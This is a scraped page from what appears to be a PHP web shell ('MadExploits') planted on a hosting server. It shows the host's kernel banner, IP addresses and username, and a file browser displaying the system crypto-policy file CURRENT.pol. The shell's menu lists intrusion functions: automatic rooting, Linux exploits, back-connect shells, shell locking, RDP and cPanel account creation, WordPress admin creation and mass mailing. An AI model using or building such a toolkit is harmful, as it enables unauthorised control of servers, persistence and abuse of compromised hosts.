Linux musi.iixcp.rumahweb.net 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
LiteSpeed
: 103.247.9.165 | : 216.73.216.63
Cant Read [ /etc/named.conf ]
7.4.33
pliq4844
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
crypto-policies /
state /
[ HOME SHELL ]
Name
Size
Permission
Action
CURRENT.pol
2.55
KB
-rw-r--r--
current
13
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CURRENT.pol
# Policy DEFAULT:SHA1 dump # # Do not parse the contents of this file with automated tools, # it is provided for review convenience only. # # Baseline values for all scopes: cipher = AES-256-GCM AES-256-CCM CHACHA20-POLY1305 AES-256-CTR AES-256-CBC AES-128-GCM AES-128-CCM AES-128-CTR AES-128-CBC group = X25519 SECP256R1 X448 SECP521R1 SECP384R1 FFDHE-2048 FFDHE-3072 FFDHE-4096 FFDHE-6144 FFDHE-8192 hash = SHA2-256 SHA2-384 SHA2-512 SHA3-256 SHA3-384 SHA3-512 SHA2-224 SHA3-224 SHAKE-256 SHA1 key_exchange = ECDHE RSA DHE DHE-RSA PSK DHE-PSK ECDHE-PSK RSA-PSK ECDHE-GSS DHE-GSS mac = AEAD HMAC-SHA2-256 HMAC-SHA1 UMAC-128 HMAC-SHA2-384 HMAC-SHA2-512 protocol = sign = ECDSA-SHA3-256 ECDSA-SHA2-256 ECDSA-SHA2-256-FIDO ECDSA-SHA3-384 ECDSA-SHA2-384 ECDSA-SHA3-512 ECDSA-SHA2-512 EDDSA-ED25519 EDDSA-ED25519-FIDO EDDSA-ED448 RSA-PSS-SHA3-256 RSA-PSS-SHA2-256 RSA-PSS-SHA3-384 RSA-PSS-SHA2-384 RSA-PSS-SHA3-512 RSA-PSS-SHA2-512 RSA-PSS-RSAE-SHA3-256 RSA-PSS-RSAE-SHA2-256 RSA-PSS-RSAE-SHA3-384 RSA-PSS-RSAE-SHA2-384 RSA-PSS-RSAE-SHA3-512 RSA-PSS-RSAE-SHA2-512 RSA-SHA3-256 RSA-SHA2-256 RSA-SHA3-384 RSA-SHA2-384 RSA-SHA3-512 RSA-SHA2-512 ECDSA-SHA2-224 RSA-PSS-SHA2-224 RSA-SHA2-224 ECDSA-SHA3-224 RSA-PSS-SHA3-224 RSA-SHA3-224 ECDSA-SHA1 RSA-PSS-SHA1 RSA-SHA1 arbitrary_dh_groups = 1 min_dh_size = 2048 min_dsa_size = 2048 min_rsa_size = 2048 sha1_in_certs = 1 ssh_certs = 1 min_ec_size = 256 etm = ANY __ems = DEFAULT # Scope-specific properties derived for select backends: cipher@gnutls = AES-256-GCM AES-256-CCM CHACHA20-POLY1305 AES-256-CBC AES-128-GCM AES-128-CCM AES-128-CBC protocol@gnutls = TLS1.3 TLS1.2 DTLS1.2 cipher@java-tls = AES-256-GCM AES-256-CCM CHACHA20-POLY1305 AES-256-CBC AES-128-GCM AES-128-CCM AES-128-CBC protocol@java-tls = TLS1.3 TLS1.2 DTLS1.2 mac@krb5 = HMAC-SHA2-384 HMAC-SHA2-256 AEAD UMAC-128 HMAC-SHA2-512 HMAC-SHA1 protocol@libreswan = IKEv2 cipher@libssh = AES-256-GCM AES-256-CCM CHACHA20-POLY1305 AES-256-CTR AES-128-GCM AES-128-CCM AES-128-CTR cipher@nss = AES-256-GCM AES-256-CCM CHACHA20-POLY1305 AES-256-CBC AES-128-GCM AES-128-CCM AES-128-CBC protocol@nss = TLS1.3 TLS1.2 DTLS1.2 cipher@openssh-client = AES-256-GCM AES-256-CCM CHACHA20-POLY1305 AES-256-CTR AES-128-GCM AES-128-CCM AES-128-CTR cipher@openssh-server = AES-256-GCM AES-256-CCM CHACHA20-POLY1305 AES-256-CTR AES-128-GCM AES-128-CCM AES-128-CTR cipher@openssl = AES-256-GCM AES-256-CCM CHACHA20-POLY1305 AES-256-CBC AES-128-GCM AES-128-CCM AES-128-CBC protocol@openssl = TLS1.3 TLS1.2 DTLS1.2 cipher@rpm = AES-256-CFB AES-256-GCM AES-256-OCB AES-256-EAX AES-128-CFB AES-128-GCM AES-128-OCB AES-128-EAX
Close